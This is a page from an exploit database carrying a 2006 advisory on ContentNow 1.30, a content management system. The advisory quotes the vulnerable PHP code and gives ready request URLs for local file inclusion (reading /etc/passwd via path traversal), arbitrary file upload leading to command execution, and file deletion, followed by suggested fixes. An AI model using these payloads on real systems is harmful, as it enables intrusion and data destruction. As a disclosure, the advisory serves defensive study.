0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ContentNow 1.30 (Local/Upload/Delete) Multiple Remote Vulnerabilities
[=====================================================================
ContentNow 1.30 (Local/Upload/Delete) Multiple Remote Vulnerabilities
=====================================================================
#####################################################################################
# #
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# #
# ContentNow 1.30 Local File Include & Arbitrary File Upload/Delete Vulnerabilities #
# #
#####################################################################################
# #
# Software: ContentNow 1.30 Vulnerabilities #
# #
# #
# Released: 2006/11/13 #
# #
# Discovered By: r0ut3r #
# #
# Criticality: Highly critical #
# #
#####################################################################################
Local file inclusion vulnerability
------------------------------------
Vuln code:
----------
33 // get/set language
34 $setLang= (empty ($_GET['lang'])) ? $cnCore->getBackendLanguage() : $_GET['lang'];
35
36 // define language
37 include_once ('./language/'.$setLang.'.language.php');
38 $lang= $cnLanguageArray[$setLang];
Exploit:
--------
http://localhost/cn/edit.php?lang=../../../../etc/passwd%00
http://localhost/cn/image.php?lang=../../../../etc/passwd%00
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00
Probably more, never checked all files.
File Upload/Command Execution Vulnerability:
---------------------------------------------
Note: They tell you to set 777 permissions on install for certain folders.
http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en
set path to equal dir location:
/ = root path
Select file, then upload it.
File Removal Vulnerability:
----------------------------
To delete files
http://localhost/contentnow_130/cn/upload.php?path=/&cid=&type=file&folder=&lang=en&delfile=q.php&single=false
set path to equal dir location:
/ = root path
set delfile for file you want to delete:
q.php
More Information:
-----------------
Email: writ3r [at] gmail.com
Fix:
-----
How about some authentication?!
Only allow the upload of certain files types, depends what you want it to use.
As for local file includes, work out a better way to set languages, ie: make sure the language file included is required for the cms.
Quick Fix:
----------
Setup .htaccess on cn/
Example Fix:
------------
.htaccess:
AuthName "ContentNow Fix!"
AuthType Basic
AuthUserFile /var/www/html/cn/.htpasswd
Require valid-user
This will prevent anyone from accessing this folder - this would be a solution for administrators whilst an upgrade, or patch is created.
If you do want to access this better make a .htpasswd file to.
# 0day.today [2024-11-15] #